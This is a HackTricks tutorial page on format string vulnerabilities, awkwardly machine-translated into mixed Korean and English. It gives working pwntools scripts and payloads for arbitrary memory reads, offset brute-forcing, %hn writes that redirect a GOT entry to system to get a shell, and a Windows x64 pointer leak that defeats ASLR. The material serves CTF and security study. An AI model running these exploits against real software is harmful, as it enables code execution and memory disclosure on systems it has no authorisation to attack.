Format Strings

Reading time: 10 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Notice that the attacker controls the printf 매개변수를 제어한다는 점, 즉 his input is going to be in the stack when printf is called, which means that he could write specific memory addresses in the stack.

caution

이 입력을 제어하는 공격자는 스택에 임의의 주소를 추가하고 printf로 그 주소들에 접근하게 할 수 있다. 다음 섹션에서 이 동작을 활용하는 방법을 설명한다.

Arbitrary Read

It's possible to use the formatter %n$s to make printf get the 주소 situated in the n 위치, following it and 문자열인 것처럼 출력하게 한다 (print until a 0x00 is found). So if the base address of the binary is 0x8048000, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:

python

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

caution

입력의 시작에 주소 0x8048000을 넣을 수 없다는 점에 유의하세요. 문자열이 해당 주소 끝의 0x00에서 잘리기 때문입니다.

오프셋 찾기

입력에 대한 오프셋을 찾으려면 4 또는 8 바이트 (0x41414141)를 보낸 다음 **%1$x**를 붙이고 A's가 나올 때까지 값을 증가시키면 됩니다.

Brute Force printf offset

python

# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()

# Start a new process of the "chall" binary
p = process("./chall")

# Send the payload to the process
p.sendline(payload)

# Read and store the output of the process
output = p.clean()

# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break

# Close the process
p.close()

유용성

Arbitrary reads는 다음과 같이 유용합니다:

Dump the binary from memory
Access specific parts of memory where sensitive info is stored (like canaries, encryption keys or custom passwords like in this CTF challenge)

Arbitrary Write

포매터 **%<num>$n**은 스택의 파라미터가 가리키는 주소에 지금까지 출력된 바이트 수를 씁니다. 공격자가 printf로 원하는 만큼 많은 char를 쓸 수 있다면, **%<num>$n**을 이용해 임의의 주소에 임의의 숫자를 쓸 수 있게 됩니다.

다행히도 숫자 9999를 쓰기 위해 입력에 "A"를 9999개 추가할 필요는 없습니다. 대신 포매터 **%.<num-write>%<num>$n**을 사용하면 <num-write> 숫자를 num 위치가 가리키는 주소에 쓸 수 있습니다.

bash

AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

하지만 보통 0x08049724 (한 번에 쓰기에는 매우 큰 수) 같은 주소를 쓰기 위해서는, $n 대신 $hn이 사용된다. 이렇게 하면 오직 2 Bytes만 쓸 수 있다. 따라서 이 작업은 주소의 상위 2B와 하위 2B에 대해 각각 두 번 수행된다.

따라서, 이 취약점은 임의의 주소에 어떤 값이든 쓸 수 있다 (arbitrary write).

이 예제에서 목표는 나중에 호출될 GOT 테이블에 있는 함수의 주소를 덮어쓰는 것이다. 물론 이는 다른 arbitrary write to exec 기법을 악용할 수도 있다:

Write What Where 2 Exec

우리는 사용자로부터 인자를 받는 함수를 덮어써서 그 함수를 system 함수로 가리키게 만들 것이다.
앞서 언급했듯 주소를 쓰기 위해서는 보통 2단계가 필요하다: 먼저 주소의 2Bytes를 쓰고 그 다음 나머지 2Bytes를 쓴다. 이를 위해 **$hn**을 사용한다.

HOB는 주소의 상위 2Bytes를 가리킨다
LOB는 주소의 하위 2Bytes를 가리킨다

그 다음, format string의 동작 방식 때문에 [HOB, LOB] 중 더 작은 값을 먼저 써야 하고 그 다음에 나머지를 써야 한다.

만약 HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

만약 HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

bash

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

Pwntools 템플릿

이러한 유형의 취약점에 대한 exploit을 준비하기 위한 템플릿은 다음에서 찾을 수 있습니다:

Format Strings Template

또는 here의 기본 예제:

python

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Format Strings to BOF

format string 취약점의 write 동작을 악용하여 write in addresses of the stack를 수행하고 buffer overflow 유형의 취약점을 악용할 수 있다.

Windows x64: Format-string leak to bypass ASLR (no varargs)

Windows x64에서는 첫 네 개의 정수/포인터 파라미터가 레지스터(RCX, RDX, R8, R9)를 통해 전달된다. 많은 버그가 있는 호출 지점에서 공격자가 제어하는 문자열이 format argument로 사용되지만 variadic arguments가 제공되지 않는 경우가 많다. 예를 들어:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

varargs가 전달되지 않기 때문에 "%p", "%x", "%s" 같은 변환은 CRT가 적절한 레지스터에서 다음 가변 인수를 읽도록 만듭니다. Microsoft x64 calling convention에서는 "%p"에 대한 첫 번째 읽기가 R9에서 이루어집니다. 호출 지점에서 R9에 있는 어떤 일시적 값이든 출력됩니다. 실제로 이는 종종 안정적인 in-module pointer를 leak하는데(예: 주변 코드에 의해 이전에 R9에 배치된 로컬/글로벌 객체에 대한 포인터 또는 callee-saved 값), 이는 module base를 복구하고 ASLR을 무력화하는 데 사용될 수 있습니다.

Practical workflow:

공격자가 제어하는 문자열의 맨 앞에 "%p " 같은 무해한 포맷을 주입하여 첫 번째 변환이 필터링 전에 실행되도록 합니다.
leaked pointer를 캡처하고, 해당 객체의 모듈 내 정적 오프셋을 식별한 다음(심볼이나 로컬 복사본으로 한 번 리버싱하여) image base를 leak - known_offset으로 복원합니다.
그 base를 재사용하여 ROP gadgets 및 IAT entries의 절대 주소를 원격으로 계산합니다.

Example (abbreviated python):

python

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))

노트:

빼야 할 정확한 offset은 로컬 reversing 중에 한 번 찾은 뒤 재사용한다 (same binary/version).
"%p"가 첫 시도에서 유효한 포인터를 출력하지 않으면, 다른 지정자("%llx", "%s")나 여러 변환("%p %p %p")을 시도해 다른 argument registers/stack를 샘플링해보자.
이 패턴은 Windows x64 calling convention과 format 문자열이 요청할 때 존재하지 않는 varargs를 registers에서 가져오는 printf-family 구현에 특화되어 있다.

이 기법은 ASLR이 적용되고 명백한 memory disclosure primitives가 없는 Windows 서비스에서 ROP를 부트스트랩하는 데 매우 유용하다.

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, format strings를 사용해 stack에서 flag를 leak하는 기본적인 예 (execution flow를 변경할 필요 없음)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string으로 fflush의 주소를 win 함수(ret2win)로 덮어쓰기
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, main 내부의 .fini_array에 주소를 쓰게 해 흐름을 한 번 더 루프시키고 GOT 테이블의 strlen을 system으로 덮어쓴다. 흐름이 다시 main으로 돌아오면 strlen이 사용자 입력과 함께 실행되고 system을 가리키므로 전달된 명령이 실행된다.

References

tip

HackTricks 지원하기

구독 계획 확인하기!
**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

HackTricks

Format Strings

기본 정보

포맷터:

포인터에 접근하기

Arbitrary Read

오프셋 찾기

유용성

Arbitrary Write

Pwntools 템플릿

Format Strings to BOF

Windows x64: Format-string leak to bypass ASLR (no varargs)

Other Examples & References

References